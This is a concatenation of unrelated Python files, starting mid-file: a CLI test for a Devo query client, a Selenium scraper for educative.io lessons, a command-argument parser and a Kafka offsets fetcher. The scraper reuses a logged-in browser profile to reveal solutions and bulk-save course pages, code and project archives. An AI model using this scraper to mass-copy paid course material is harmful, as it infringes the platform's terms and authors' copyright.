                                       "--address", self.uri,
                                       "--key", "aaa",
                                       "--secret", self.secret])
        self.assertIsInstance(result.exception, DevoClientException)
        self.assertEqual(result.exception.args[0]['status'], 401)

    def test_normal_query(self):
        """A valid query succeeds and prints the result header map."""
        runner = CliRunner()
        result = runner.invoke(query, ["--debug",
                                       "--from", "2018-01-01",
                                       "--query", "from demo.ecommerce.data "
                                                  "select timestamp limit 1",
                                       "--address", self.uri,
                                       "--key", self.key,
                                       "--secret", self.secret])
        self.assertIsNone(result.exception)
        self.assertEqual(result.exit_code, 0)
        self.assertIn('{"m":{"timestamp":{"type":"str","index":0}}}',
                      result.output)

    def test_with_config_file(self):
        """The same query succeeds when credentials come from a config file."""
        if self.config_path:
            runner = CliRunner()
            result = runner.invoke(query, ["--debug",
                                           "--from", "2018-01-01",
                                           "--query",
                                           "from demo.ecommerce.data "
                                           "select timestamp limit 1",
                                           "--config", self.config_path])
            self.assertIsNone(result.exception)
            self.assertEqual(result.exit_code, 0)
            self.assertIn('{"m":{"timestamp":{"type":"str","index":0}}}',
                          result.output)
# Allow running this test module directly (python tests/api/cli.py).
if __name__ == '__main__':
    unittest.main()
|
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
# Configure a headless Chrome session that reuses an existing signed-in
# profile (so the educative.io login cookies are already present).
options = webdriver.ChromeOptions()
options.add_argument('headless')
# Point Chrome at the local user profile; path is machine-specific.
options.add_argument("user-data-dir=C:\\Users\\anila\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 7\\")
options.add_argument(r'--profile-directory=Default')
options.add_argument("--start-maximized")
# Common stability flags for headless runs.
options.add_argument('--disable-gpu')
options.add_argument('--no-sandbox')
driver = webdriver.Chrome(executable_path="C:/chromedriver.exe", chrome_options=options)
driver.set_window_size(1920,1080)
# username = '<EMAIL>'
# password = '<PASSWORD>'
# driver.get("https://educative.io/login")
# driver.get_screenshot_as_file('testa.png')
# time.sleep(4)
# user_inp = driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input')
# user_inp.send_keys(username)
# pass_inp = driver.find_element_by_xpath('//*[@id="password-field"]')
# pass_inp.send_keys(password)
# driver.find_element_by_xpath('//*[@id="password-field"]').send_keys(Keys.RETURN)
# time.sleep(2)
# try:
# auth_inp = driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input')
# auth = input("Enter auth code: ")
# auth_inp.send_keys(auth)
# driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input').send_keys(Keys.RETURN)
# except:
# pass
# driver.get_screenshot_as_file('testb.png')
# time.sleep(5)
# driver.get_screenshot_as_file('testc.png')
def code_copy(container, driver):
    """Click the widget's copy-to-clipboard icon, paste the clipboard into the
    injected "tempcodebox" textarea, and return the pasted text.

    container -- element containing the copy icon (svg.w-7.h-7)
    driver    -- the active webdriver, used to locate the paste target
    """
    copy_icons = container.find_elements_by_css_selector("svg.w-7.h-7")
    copy_icons[0].click()
    print("Clicked on Clipboard")
    paste_target = driver.find_element_by_css_selector("textarea.tempcodebox")
    paste_target.click()
    time.sleep(1)
    # Select anything already in the box, then overwrite with the clipboard.
    paste_target.send_keys(Keys.CONTROL, "a")
    paste_target.send_keys(Keys.CONTROL, "v")
    time.sleep(1)
    print("Paste complete")
    return paste_target.get_attribute('value')
# Main scraping loop: walk educative.io lesson pages one by one, expanding
# answers/slides, screenshotting each page and saving every code widget's
# contents to per-page "<index>-Codes" folders. Stops at "Next Module".
image_count = int(input("Enter starting index: "))
url = input("Enter url: ")
driver.get(url)
while True:
    bckpath = os.getcwd()
    print("---------------",image_count,"-------------------")
    flag = 0  # 0 = page processed OK, 1 = error (retry the same page)
    try:
        time.sleep(15)  # let the SPA finish rendering
        # Page title lives either in h2.mb-10 or in the h1 fallback below.
        pimage_name = driver.find_elements_by_css_selector('h2.mb-10')
        if pimage_name != []:
            if pimage_name[0] == "":
                raise Exception
            else:
                image_name = pimage_name[0].get_attribute('innerHTML')
        else:
            image_name = driver.find_element_by_css_selector('h1.text-3xl.font-semibold.text-left.mb-2').get_attribute('innerHTML')
            if image_name == "":
                raise Exception
        # Resize the window to the full page height for whole-page capture.
        S = lambda X: driver.execute_script('return document.body.parentNode.scroll'+X)
        driver.set_window_size(1920,S('Height'))
        # Expand every "show answer" button.
        answers = driver.find_elements_by_css_selector('button.whitespace-normal.outlined-default.m-0')
        if answers != []:
            for answer in answers:
                answer.click()
        # Open any hidden "Solution" tabs.
        answers = driver.find_elements_by_css_selector('div.tailwind-hidden')
        if answers != []:
            for answer in answers:
                if answer.get_attribute('innerHTML') == "Solution" or answer.get_attribute('innerHTML') == "Show Solution":
                    answer.click()
                    time.sleep(1)
                    driver.find_element_by_css_selector('button.text-default.py-2.m-2').click()
                    time.sleep(1)
        # Inject a temporary textarea near the title; code_copy() pastes the
        # clipboard into it so the text can be read back.
        if pimage_name == []:
            js = '''var div = document.getElementsByClassName("text-3xl font-semibold text-left mb-2")[0];
                    var input = document.createElement("textarea");
                    input.name = "tempcodebox";
                    input.className = "tempcodebox";
                    input.maxLength = "10000";
                    input.cols = "50";
                    input.rows = "10";
                    div.appendChild(input);'''
            driver.execute_script(js)
        else:
            js = '''var div = document.getElementsByClassName("mb-10")[0];
                    var input = document.createElement("textarea");
                    input.name = "tempcodebox";
                    input.className = "tempcodebox";
                    input.maxLength = "10000";
                    input.cols = "50";
                    input.rows = "10";
                    div.appendChild(input);'''
            driver.execute_script(js)
        # Solution code editors: copy their contents via the copy button, or
        # stretch them open so the screenshot shows everything.
        answers = driver.find_elements_by_css_selector('div.styles__CodeEditorStyled-sc-2pjuhh-0.dgoHVT')
        if answers != []:
            bckpath = os.getcwd()
            for answer in range(len(answers)):
                clipboard = answers[answer].find_element_by_xpath('../..')
                clipboard = clipboard.find_elements_by_css_selector('button.Button-sc-1i9ny0d-0.CircleButton-sc-1w51ure-0.Widget__CopyButton-csjrsw-3.styles__Buttons_Copy-sc-2pjuhh-3.kamgiT')
                if clipboard != []:
                    try:
                        js = '''document.getElementsByClassName("Button-sc-1i9ny0d-0 CircleButton-sc-1w51ure-0 Widget__CopyButton-csjrsw-3 styles__Buttons_Copy-sc-2pjuhh-3 kamgiT")[0].click();'''
                        driver.execute_script(js)
                        print("Clicked on Solution Clipboard")
                        textbox = driver.find_element_by_css_selector("textarea.tempcodebox")
                        textbox.click()
                        time.sleep(1)
                        textbox.send_keys(Keys.CONTROL, "a")
                        textbox.send_keys(Keys.CONTROL, "v")
                        time.sleep(1)
                        print("Paste complete")
                        if str(image_count)+"-Codes" not in os.listdir():
                            os.mkdir(str(image_count)+"-Codes")
                        os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
                        f = open('Solution'+str(answer)+'.txt' , 'w',encoding='utf-8')
                        f.write(textbox.get_attribute('value'))
                        f.close()
                    except Exception as e:
                        print("Error copying text")
                        print(e)
                        pass
                else:
                    # No copy button: expand the editor for the screenshot.
                    js = '''document.getElementsByClassName("styles__CodeEditorStyled-sc-2pjuhh-0 dgoHVT")['''+str(answer)+'''].style.height = "3000px";'''
                    driver.execute_script(js)
            os.chdir(bckpath)
        # Remove the injected textarea before taking the screenshot.
        js = '''document.getElementsByClassName("tempcodebox")[0].remove();'''
        driver.execute_script(js)
        # Slides: click each play/expand button so they render fully.
        slides = driver.find_elements_by_css_selector('button.Button-sc-1i9ny0d-0.CircleButton-sc-1w51ure-0.styles__AnimationPlus-sc-8tvqhb-13.gjbvCG')
        if slides != []:
            for slide in slides:
                slide.click()
                print("Slides opened")
                time.sleep(10)
        else:
            print("Slides skipped")
        S = lambda X: driver.execute_script('return document.body.parentNode.scroll'+X)
        driver.set_window_size(1920,S('Height'))
        time.sleep(1)
        # Strip characters that are illegal in Windows file names.
        for char in range(len(image_name)):
            if image_name[char] == "#" or image_name[char] == ":" or image_name[char] == "?" or image_name[char] == "/" or image_name[char]=='"' or image_name[char] == "|" or image_name[char] == "*" or image_name[char] == "\\":
                image_name = image_name[:char] + " " + image_name[char+1:]
        driver.find_element_by_xpath("/html/body/div[1]/div[2]/div[2]").screenshot(str(image_count)+"-"+image_name+".png")
        print("Image Created")
        # Re-inject the textarea for the code-widget copies below.
        if pimage_name == []:
            js = '''var div = document.getElementsByClassName("text-3xl font-semibold text-left mb-2")[0];
                    var input = document.createElement("textarea");
                    input.name = "tempcodebox";
                    input.className = "tempcodebox";
                    input.maxLength = "10000";
                    input.cols = "50";
                    input.rows = "10";
                    div.appendChild(input);'''
            driver.execute_script(js)
        else:
            js = '''var div = document.getElementsByClassName("mb-10")[0];
                    var input = document.createElement("textarea");
                    input.name = "tempcodebox";
                    input.className = "tempcodebox";
                    input.maxLength = "10000";
                    input.cols = "50";
                    input.rows = "10";
                    div.appendChild(input);'''
            driver.execute_script(js)
        c1,c2 = 0,0  # counters for the "Box"/"BoxT2-" output folders
        # Main Case: standard code containers, each saved under Box<N>.
        containers = driver.find_elements_by_css_selector('div.code-container')
        if containers != []:
            bckpath = os.getcwd()
            if str(image_count)+"-Codes" not in os.listdir():
                os.mkdir(str(image_count)+"-Codes")
            os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
            cdbckpath = os.getcwd()
            for container in containers:
                codebox_1 = container.find_element_by_xpath('../..')
                codebox_1_ul = codebox_1.find_elements_by_css_selector('ul.styles__TabNav-sc-2pjuhh-15.bbbOxq.nav.nav-tabs')
                codebox_2 = container.find_elements_by_css_selector('div.Widget__MultiFiles-csjrsw-6.styles__MultiFiles-sc-2pjuhh-8.bXHbra')
                # Case 1: language tab bar (ul), with or without a file box.
                if codebox_1_ul != []:
                    print("------Case 1-------")
                    os.chdir(cdbckpath)
                    if "Box"+str(c1) not in os.listdir():
                        os.makedirs("Box"+str(c1))
                    os.chdir(os.getcwd()+"\\Box"+str(c1))
                    c1+=1
                    tabs_ul = codebox_1_ul[0].find_elements_by_css_selector('span.desktop-only.styles__DesktopOnly-sc-2pjuhh-19.agoNC')
                    for tab_ul in tabs_ul:
                        tab_ul.click()
                        time.sleep(1)
                        print("Tab clicked of Ul tag")
                        tab_lang = tab_ul.find_element_by_css_selector('span.styles__TabTitle-sc-2pjuhh-14.hndpvI').get_attribute('innerHTML')
                        # Case 2: language tab AND a per-file box inside it.
                        file_box = codebox_1.find_elements_by_css_selector('div.styles__Files-sc-2pjuhh-10.klYjb')
                        if file_box != []:
                            print("------Case 2--------")
                            files = file_box[0].find_elements_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.jFUhiu')
                            try:
                                codes = code_copy(codebox_1,driver)
                                lang = file_box[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
                                fname = tab_lang+lang+".txt"
                                f = open(fname , "w", encoding='utf-8')
                                f.write(codes)
                                f.close()
                                print("Txt File Created")
                            except:
                                print("Error cannot create txt file")
                            for file in files:
                                print("Tab Clicked of File Box")
                                file.click()
                                time.sleep(1)
                                try:
                                    codes = code_copy(codebox_1,driver)
                                    lang = file_box[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
                                    fname = tab_lang+lang+".txt"
                                    f = open(fname , "w", encoding='utf-8')
                                    f.write(codes)
                                    f.close()
                                    print("Txt File Created")
                                except:
                                    print("Error cannot create txt file")
                        else:
                            # Only the language tab, no file box: one file per tab.
                            try:
                                codes = code_copy(codebox_1,driver)
                                lang = tab_ul.find_element_by_css_selector('span.styles__TabTitle-sc-2pjuhh-14.hndpvI').get_attribute('innerHTML')
                                fname = tab_lang+".txt"
                                f = open(fname , "w", encoding='utf-8')
                                f.write(codes)
                                f.close()
                                print("Txt File Created")
                            except:
                                print("Error cannot create txt file")
                elif codebox_1_ul == [] and codebox_2 != []:
                    # Case 3: no language tab bar, only a multi-file box.
                    print("-------Case 3-----------")
                    os.chdir(cdbckpath)
                    if "Box"+str(c1) not in os.listdir():
                        os.makedirs("Box"+str(c1))
                    os.chdir(os.getcwd()+"\\Box"+str(c1))
                    c1+=1
                    files = codebox_2[0].find_elements_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.jFUhiu')
                    try:
                        codes = code_copy(codebox_2[0],driver)
                        lang = codebox_2[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
                        fname = lang+".txt"
                        f = open(fname , "w", encoding='utf-8')
                        f.write(codes)
                        f.close()
                        print("Txt File Created")
                    except:
                        print("Error cannot create txt file")
                    for file in files:
                        print("Tab Clicked of File Box")
                        file.click()
                        time.sleep(1)
                        try:
                            codes = code_copy(codebox_2[0],driver)
                            lang = codebox_2[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
                            fname = lang+".txt"
                            f = open(fname , "w", encoding='utf-8')
                            f.write(codes)
                            f.close()
                            print("Txt File Created")
                        except:
                            print("Error cannot create txt file")
                elif codebox_1_ul == [] and codebox_2 == []:
                    # Case 4: bare code container — single unnamed box.
                    print("--------Case 4-------")
                    os.chdir(cdbckpath)
                    try:
                        codes = code_copy(container,driver)
                        fname = "CodeBox"+str(c1)+".txt"
                        f = open(fname , "w", encoding='utf-8')
                        f.write(codes)
                        f.close()
                        print("Txt File Created")
                    except:
                        print("Error , cannot create txt file")
                        pass
                    c1+=1
            os.chdir(bckpath)
        # Case 5: SPA-style project widgets — download their zip archives.
        containers = driver.find_elements_by_css_selector('div.styles__Spa_Container-sc-1vx22vv-62.jquSGK')
        if containers != []:
            print("-------Case 5--------")
            bckpath = os.getcwd()
            if str(image_count)+"-Codes" not in os.listdir():
                os.mkdir(str(image_count)+"-Codes")
            os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
            cdbckpath = os.getcwd()
            for container in containers:
                os.chdir(cdbckpath)
                if "BoxT2-"+str(c2) not in os.listdir():
                    os.makedirs("BoxT2-"+str(c2))
                os.chdir(os.getcwd()+"\\BoxT2-"+str(c2))
                c2+=1
                # Point Chrome's download directory at the current folder via
                # the DevTools Page.setDownloadBehavior command.
                driver.command_executor._commands["send_command"] = ("POST", '/session/$sessionId/chromium/send_command')
                params = {'cmd': 'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': os.getcwd()}}
                driver.execute("send_command", params)
                try:
                    container.find_elements_by_css_selector("svg.w-7.h-7")[1].click()
                    time.sleep(2)
                    print("Downloaded Zip File")
                except:
                    print("Zip File not Downloaded")
                    pass
                # files = container.find_element_by_css_selector('div.children')
                # tabs = files.find_elements_by_css_selector('span.styles__NavIcon-sc-1vx22vv-21.cueaXz')
                # for tab in tabs:
                #     if tab.get_attribute('innerHTML') == "":
                #         tab = tab.find_element_by_xpath('../..')
                #         tab = tab.find_element_by_css_selector('span.node')
                #         print("Tab Clicked")
                #         tab.click()
                #         time.sleep(1)
                #         lang = tab.get_attribute('innerHTML')[58:]
                #         codes = code_copy(container,driver)
                #         fname = lang+".txt"
                #         f = open(fname , "w",encoding='utf-8')
                #         f.write(codes)
                #         f.close()
            os.chdir(bckpath)
        driver.set_window_size(1920,1080)
    except Exception as e:
        # Any failure: flag the page, reload it and retry on the next pass.
        flag = 1
        driver.refresh()
        os.chdir(bckpath)
        print(e)
        pass
    print(flag)
    if flag == 0:
        # Advance to the next lesson; stop at the end of the module.
        try:
            if driver.find_elements_by_css_selector('button.outlined-primary.m-0')[0].get_attribute('innerHTML')[:11] == "Next Module":
                # file = open(str(image_count)+"-NewModule.txt" ,"w")
                # file.write("New Module at pos "+str(image_count))
                # file.close()
                driver.quit()
                break
            # time.sleep(1)
            # driver.find_elements_by_css_selector('button.outlined-primary.m-0')[0].click()
            js = '''document.getElementsByClassName('outlined-primary m-0')[0].click();'''
            driver.execute_script(js)
            print("Next Page")
            image_count+=1
        except Exception as e:
            print(e)
            driver.quit()
            break
    else:
        pass
print("Finished")
<gh_stars>10-100
#!/usr/bin/python -tt
#
# Copyright 2009-2010 Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from exceptions import *
import command
import tokenize
class ParsedArgs(object):
    """Empty namespace object; ArgCommand.run() populates it with one
    attribute per declared argument (named via Argument.getName())."""
    pass
class ArgCommand(command.Command):
    """A command whose positional arguments are declared via Argument objects.

    Subclasses supply the Argument list and implement runParsed(), which
    receives a ParsedArgs namespace with one attribute per argument.
    """

    def __init__(self, args, help):
        # Attribute names are part of the public surface; keep them.
        self.argTypes = args
        self.helpText = help

    def run(self, cli_obj, name, args, line):
        """Parse positional arguments and dispatch to runParsed().

        Raises CommandArgumentsError on trailing arguments or on a missing
        required argument.
        """
        args = args[1:]  # drop the command name itself
        num_args = len(args)
        num_arg_types = len(self.argTypes)
        if num_args > num_arg_types:
            raise CommandArgumentsError(
                'trailing arguments: ' + tokenize.escape_args(args[num_arg_types:]))
        parsed_args = ParsedArgs()
        for arg_type, raw in zip(self.argTypes, args):
            setattr(parsed_args, arg_type.getName(), arg_type.parse(cli_obj, raw))
        if num_args < num_arg_types:
            # The first unsupplied argument must be optional; flags on any
            # later arguments are irrelevant once this one is optional.
            next_arg = self.argTypes[num_args]
            if not next_arg.isOptional():
                raise CommandArgumentsError('missing %s' % (next_arg.getHrName(),))
            for arg_type in self.argTypes[num_args:]:
                setattr(parsed_args, arg_type.getName(), arg_type.getDefaultValue())
        return self.runParsed(cli_obj, name, parsed_args)

    def help(self, cli_obj, name, args, line):
        """Print a one-line syntax summary, then the help text if any."""
        args = args[1:]
        syntax = name
        closers = ''
        for arg in self.argTypes:
            if arg.isOptional():
                # Optional args open a bracket that is closed at the end.
                syntax += ' [<%s>' % (arg.getName(),)
                closers += ']'
            else:
                syntax += ' <%s>' % (arg.getName(),)
        cli_obj.output(syntax + closers)
        if not self.helpText:
            return
        # FIXME: do nicer formatting of the help message
        cli_obj.output()
        cli_obj.output(self.helpText)

    def complete(self, cli_obj, name, args, text):
        """Delegate completion to the argument at the current position."""
        remaining = args[1:]
        if len(remaining) < len(self.argTypes):
            return self.argTypes[len(remaining)].complete(cli_obj, text)
        return []
class Argument(object):
    """Declarative description of one positional command argument.

    Keyword options:
        default  -- value used when the argument is omitted (default None)
        hr_name  -- human-readable name for error messages (defaults to name)
        optional -- whether the argument may be omitted (default False)
    """

    def __init__(self, name, **kwargs):
        self.name = name
        self.hrName = kwargs.pop('hr_name', name)
        self.default = kwargs.pop('default', None)
        self.optional = kwargs.pop('optional', False)
        if kwargs:
            # Report the first unrecognized keyword, mirroring normal
            # TypeError behavior for bad keyword arguments.
            raise TypeError('unknown keyword argument %r' % (next(iter(kwargs)),))

    def getName(self):
        """Return the attribute name used on ParsedArgs."""
        return self.name

    def getHrName(self):
        """
        arg.getHrName() --> string
        Get the human-readable name.
        """
        return self.hrName

    def isOptional(self):
        """Return True if this argument may be omitted."""
        return self.optional

    def getDefaultValue(self):
        """Return the value used when the argument is omitted."""
        return self.default

    def complete(self, cli_obj, text):
        """Return completion candidates; the base class offers none."""
        return []
class StringArgument(Argument):
    """Argument accepted verbatim; any string is valid."""

    def parse(self, cli_obj, arg):
        # Free-form strings need no validation or conversion.
        return arg
class IntArgument(Argument):
    """Argument parsed as an integer, with optional inclusive-ish bounds.

    Keyword options 'min' and 'max' bound the accepted value; all other
    keyword arguments are forwarded to Argument.__init__().
    """

    def __init__(self, name, **kwargs):
        self.min = None
        self.max = None
        arg_kwargs = {}
        for (kwname, kwvalue) in kwargs.items():
            if kwname == 'min':
                self.min = kwvalue
            elif kwname == 'max':
                # BUG FIX: previously this assigned the *builtin* max()
                # function (self.max = max) instead of the supplied value,
                # so the upper bound was never applied correctly and
                # parse() compared an int against a function object.
                self.max = kwvalue
            else:
                arg_kwargs[kwname] = kwvalue
        Argument.__init__(self, name, **arg_kwargs)

    def parse(self, cli_obj, arg):
        """Parse arg as an int.

        Raises CommandArgumentsError if the string is not an integer or the
        value falls outside the configured [min, max] range.
        """
        try:
            value = int(arg)
        except ValueError:
            msg = '%s must be an integer' % (self.getHrName(),)
            raise CommandArgumentsError(msg)
        if self.min is not None and value < self.min:
            msg = '%s must be greater than %s' % (self.getHrName(), self.min)
            raise CommandArgumentsError(msg)
        if self.max is not None and value > self.max:
            msg = '%s must be less than %s' % (self.getHrName(), self.max)
            raise CommandArgumentsError(msg)
        return value
|
<reponame>buildfail/frontera
from __future__ import absolute_import
import copy
import logging
import time
import collections
import six
from kafka.client_async import KafkaClient
from kafka import errors as Errors, TopicPartition
from kafka.future import Future
from kafka.protocol.commit import GroupCoordinatorRequest, OffsetFetchRequest
from kafka.protocol.offset import OffsetRequest
from kafka.structs import OffsetAndMetadata
log = logging.getLogger('offsets-fetcher')
class OffsetsFetcherAsync(object):
    """Stand-alone Kafka consumer-lag prober.

    Discovers the group coordinator, fetches log-end offsets and the group's
    committed offsets for a single topic, and reports the per-partition lag
    (log-end offset minus committed offset) via get().
    """

    DEFAULT_CONFIG = {
        'session_timeout_ms': 30000,
        'heartbeat_interval_ms': 3000,
        'retry_backoff_ms': 100,
        'api_version': (0, 9),
        'metric_group_prefix': ''
    }

    def __init__(self, **configs):
        # NOTE(review): 'group_id' and 'topic' are required keys; a missing
        # key raises a bare KeyError here rather than a friendlier error.
        self.config = copy.copy(self.DEFAULT_CONFIG)
        self.config.update(configs)
        self._client = KafkaClient(**self.config)
        self._coordinator_id = None
        self.group_id = configs['group_id']
        self.topic = configs['topic']

    def _ensure_coordinator_known(self):
        """Block until the coordinator for this group is known
        (and we have an active connection -- java client uses unsent queue).
        """
        while self._coordinator_unknown():
            # Prior to 0.8.2 there was no group coordinator
            # so we will just pick a node at random and treat
            # it as the "coordinator"
            if self.config['api_version'] < (0, 8, 2):
                self._coordinator_id = self._client.least_loaded_node()
                self._client.ready(self._coordinator_id)
                continue
            future = self._send_group_coordinator_request()
            self._client.poll(future=future)
            if future.failed():
                if isinstance(future.exception,
                              Errors.GroupCoordinatorNotAvailableError):
                    continue
                elif future.retriable():
                    # Retriable failure: refresh metadata and loop again.
                    metadata_update = self._client.cluster.request_update()
                    self._client.poll(future=metadata_update)
                else:
                    raise future.exception  # pylint: disable-msg=raising-bad-type

    def _coordinator_unknown(self):
        """Check if we know who the coordinator is and have an active connection
        Side-effect: reset _coordinator_id to None if connection failed
        Returns:
            bool: True if the coordinator is unknown
        """
        if self._coordinator_id is None:
            return True
        if self._client.is_disconnected(self._coordinator_id):
            self._coordinator_dead()
            return True
        return False

    def _coordinator_dead(self, error=None):
        """Mark the current coordinator as dead."""
        if self._coordinator_id is not None:
            log.warning("Marking the coordinator dead (node %s) for group %s: %s.",
                        self._coordinator_id, self.group_id, error)
            self._coordinator_id = None

    def _send_group_coordinator_request(self):
        """Discover the current coordinator for the group.
        Returns:
            Future: resolves to the node id of the coordinator
        """
        node_id = self._client.least_loaded_node()
        if node_id is None:
            return Future().failure(Errors.NoBrokersAvailable())
        log.debug("Sending group coordinator request for group %s to broker %s",
                  self.group_id, node_id)
        request = GroupCoordinatorRequest[0](self.group_id)
        future = Future()
        _f = self._client.send(node_id, request)
        _f.add_callback(self._handle_group_coordinator_response, future)
        _f.add_errback(self._failed_request, node_id, request, future)
        return future

    def _handle_group_coordinator_response(self, future, response):
        """Resolve `future` with the coordinator node id from `response`."""
        log.debug("Received group coordinator response %s", response)
        if not self._coordinator_unknown():
            # We already found the coordinator, so ignore the request
            log.debug("Coordinator already known -- ignoring metadata response")
            future.success(self._coordinator_id)
            return
        error_type = Errors.for_code(response.error_code)
        if error_type is Errors.NoError:
            ok = self._client.cluster.add_group_coordinator(self.group_id, response)
            if not ok:
                # This could happen if coordinator metadata is different
                # than broker metadata
                future.failure(Errors.IllegalStateError())
                return
            self._coordinator_id = response.coordinator_id
            log.info("Discovered coordinator %s for group %s",
                     self._coordinator_id, self.group_id)
            self._client.ready(self._coordinator_id)
            future.success(self._coordinator_id)
        elif error_type is Errors.GroupCoordinatorNotAvailableError:
            log.debug("Group Coordinator Not Available; retry")
            future.failure(error_type())
        elif error_type is Errors.GroupAuthorizationFailedError:
            error = error_type(self.group_id)
            log.error("Group Coordinator Request failed: %s", error)
            future.failure(error)
        else:
            error = error_type()
            log.error("Unrecognized failure in Group Coordinator Request: %s",
                      error)
            future.failure(error)

    def _failed_request(self, node_id, request, future, error):
        """Generic errback: log, possibly mark the coordinator dead, fail future."""
        log.error('Error sending %s to node %s [%s]',
                  request.__class__.__name__, node_id, error)
        # Marking coordinator dead
        # unless the error is caused by internal client pipelining
        if not isinstance(error, (Errors.NodeNotReadyError,
                                  Errors.TooManyInFlightRequests)):
            self._coordinator_dead()
        future.failure(error)

    def offsets(self, partitions, timestamp):
        """Fetch a single offset before the given timestamp for the set of partitions.
        Blocks until offset is obtained, or a non-retriable exception is raised
        Arguments:
            partitions (iterable of TopicPartition) The partition that needs fetching offset.
            timestamp (int): timestamp for fetching offset. -1 for the latest
                available, -2 for the earliest available. Otherwise timestamp
                is treated as epoch seconds.
        Returns:
            dict: TopicPartition and message offsets
        """
        retries = 3
        while retries > 0:
            offsets = {}
            for future in self._send_offset_request(partitions, timestamp):
                self._client.poll(future=future)
                if future.succeeded():
                    for tp, offset in future.value:
                        offsets[tp] = offset
                    continue
                if not future.retriable():
                    raise future.exception  # pylint: disable-msg=raising-bad-type
                if future.exception.invalid_metadata:
                    refresh_future = self._client.cluster.request_update()
                    self._client.poll(future=refresh_future)
                log.warning("Got exception %s and kept the loop", future.exception)
            # NOTE(review): a partially-filled dict is returned as success;
            # partitions whose fetch failed are simply absent.
            if offsets:
                return offsets
            retries -= 1
            log.warning("Retrying the offsets fetch loop (%d retries left)", retries)
        log.error("Unsuccessful offsets retrieval")
        return {}

    def _send_offset_request(self, partitions, timestamp):
        """Fetch a single offset before the given timestamp for the partition.
        Arguments:
            partitions iterable of TopicPartition: partitions that needs fetching offset
            timestamp (int): timestamp for fetching offset
        Returns:
            list of Future: resolves to the corresponding offset
        """
        topic = partitions[0].topic
        nodes_per_partitions = {}
        for partition in partitions:
            node_id = self._client.cluster.leader_for_partition(partition)
            if node_id is None:
                log.debug("Partition %s is unknown for fetching offset,"
                          " wait for metadata refresh", partition)
                return [Future().failure(Errors.StaleMetadata(partition))]
            elif node_id == -1:
                log.debug("Leader for partition %s unavailable for fetching offset,"
                          " wait for metadata refresh", partition)
                return [Future().failure(Errors.LeaderNotAvailableError(partition))]
            nodes_per_partitions.setdefault(node_id, []).append(partition)
        # Client returns a future that only fails on network issues
        # so create a separate future and attach a callback to update it
        # based on response error codes
        futures = []
        for node_id, partitions in six.iteritems(nodes_per_partitions):
            request = OffsetRequest[0](
                -1, [(topic, [(partition.partition, timestamp, 1) for partition in partitions])]
            )
            future_request = Future()
            _f = self._client.send(node_id, request)
            _f.add_callback(self._handle_offset_response, partitions, future_request)

            # BUG FIX: bind the current future as a default argument. The
            # closure previously captured the loop variable 'future_request'
            # late-binding, so an errback firing after the loop finished
            # would fail the *last* request's future instead of its own.
            def errback(e, future_request=future_request):
                log.error("Offset request errback error %s", e)
                future_request.failure(e)
            _f.add_errback(errback)
            futures.append(future_request)
        return futures

    def _handle_offset_response(self, partitions, future, response):
        """Callback for the response of the list offset call above.
        Arguments:
            partitions (list of TopicPartition): the partitions that were fetched
            future (Future): the future to update based on response
            response (OffsetResponse): response from the server
        Raises:
            AssertionError: if response does not match partition
        """
        topic, partition_info = response.topics[0]
        assert len(response.topics) == 1, (
            'OffsetResponse should only be for a single topic')
        partition_ids = set([part.partition for part in partitions])
        result = []
        for pi in partition_info:
            part, error_code, offsets = pi
            assert topic == partitions[0].topic and part in partition_ids, (
                'OffsetResponse partition does not match OffsetRequest partition')
            error_type = Errors.for_code(error_code)
            if error_type is Errors.NoError:
                assert len(offsets) == 1, 'Expected OffsetResponse with one offset'
                log.debug("Fetched offset %s for partition %d", offsets[0], part)
                result.append((TopicPartition(topic, part), offsets[0]))
            elif error_type in (Errors.NotLeaderForPartitionError,
                                Errors.UnknownTopicOrPartitionError):
                log.debug("Attempt to fetch offsets for partition %s failed due"
                          " to obsolete leadership information, retrying.",
                          str(partitions))
                future.failure(error_type(partitions))
            else:
                log.warning("Attempt to fetch offsets for partition %s failed due to:"
                            " %s", partitions, error_type)
                future.failure(error_type(partitions))
        # NOTE(review): after a failure above, execution still reaches this
        # success() call on the same future -- verify the Future implementation
        # tolerates double completion.
        future.success(result)

    def fetch_committed_offsets(self, partitions):
        """Fetch the current committed offsets for specified partitions
        Arguments:
            partitions (list of TopicPartition): partitions to fetch
        Returns:
            dict: {TopicPartition: OffsetAndMetadata}
        """
        if not partitions:
            return {}
        while True:
            self._ensure_coordinator_known()
            # contact coordinator to fetch committed offsets
            future = self._send_offset_fetch_request(partitions)
            self._client.poll(future=future)
            if future.succeeded():
                return future.value
            if not future.retriable():
                raise future.exception  # pylint: disable-msg=raising-bad-type
            time.sleep(self.config['retry_backoff_ms'] / 1000.0)

    def _send_offset_fetch_request(self, partitions):
        """Fetch the committed offsets for a set of partitions.
        This is a non-blocking call. The returned future can be polled to get
        the actual offsets returned from the broker.
        Arguments:
